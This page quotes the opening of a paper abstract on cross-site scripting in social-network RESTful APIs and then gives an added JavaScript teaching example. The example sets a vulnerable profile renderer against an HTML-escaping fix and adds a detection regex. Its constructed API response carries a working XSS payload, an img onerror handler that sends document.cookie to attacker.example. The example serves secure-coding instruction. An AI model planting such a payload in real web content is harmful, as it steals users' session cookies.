Cross-Site Scripting Attacks in Social Network APIs

RESTful APIs are increasingly used by web developers to extend the functionality of websites. This also raises the threat of cross-site scripting (XSS) attacks. Unlike traditional XSS attacks, XSS attacks in this setting can exploit further characteristics of RESTful APIs. RESTful APIs are common in social networks, so in this paper we take social networks as motivating examples to illustrate XSS attacks in
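The abstract's point is that data returned by a RESTful API is just as attacker-controlled as a form field, and a client that trusts it because it "came from our API" creates a stored XSS sink. The following is an added example written for this page, not code from the paper: it models a social-network profile endpoint whose `bio` field an attacker has set through the API, a client that interpolates the JSON fields straight into markup (the same effect as assigning `innerHTML`), the HTML-context escaping that defuses it, and a check over the rendered output. The endpoint shape, field names, the `attacker.example` host and the payload are all constructed for illustration.

```javascript
// Added example, not from the paper. Demonstrates stored XSS through a
// social-network RESTful API response and its hardened counterpart.

// Constructed JSON body, as an API might return it for GET /users/{id}.
// The "bio" field is attacker-controlled: the user set it via the same API.
// (Hypothetical endpoint, field names and payload.)
const constructedApiResponse = JSON.stringify({
  id: 1234,
  name: "mallory",
  bio: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
});

// Vulnerable client: JSON parsing is not HTML encoding. Fields are dropped
// into markup unescaped, which is what element.innerHTML = ... would do.
function renderProfileUnsafe(jsonBody) {
  const user = JSON.parse(jsonBody);
  return `<div class="profile"><h2>${user.name}</h2><p>${user.bio}</p></div>`;
}

// HTML-context escaping: the characters that can change parsing in text
// content and in double- or single-quoted attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened client: every API-sourced field is escaped for the context it
// lands in. In a browser, element.textContent = user.bio achieves the same
// for text nodes; attribute and URL contexts need their own encoders.
function renderProfileSafe(jsonBody) {
  const user = JSON.parse(jsonBody);
  return `<div class="profile"><h2>${escapeHtml(user.name)}</h2><p>${escapeHtml(user.bio)}</p></div>`;
}

// Review check: did a tag carrying an event-handler attribute survive from
// the untrusted field into the rendered markup? Escaped output cannot match,
// because its "<" has become "&lt;".
function containsActiveContent(html) {
  return /<(img|svg|script|iframe)\b[^>]*\bon\w+\s*=/i.test(html);
}

// Stand-alone run: prints both renderings and the check result for each.
if (typeof require !== "undefined" && require.main === module) {
  for (const render of [renderProfileUnsafe, renderProfileSafe]) {
    const html = render(constructedApiResponse);
    console.log(render.name, "->", containsActiveContent(html), "\n ", html);
  }
}
```

The lesson a practitioner should take from the check is that the fix belongs at the sink: the API may legitimately store arbitrary text in `bio`, so server-side stripping of `<` on write is neither sufficient (other clients, other contexts) nor necessary once every client encodes for the context it renders into.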
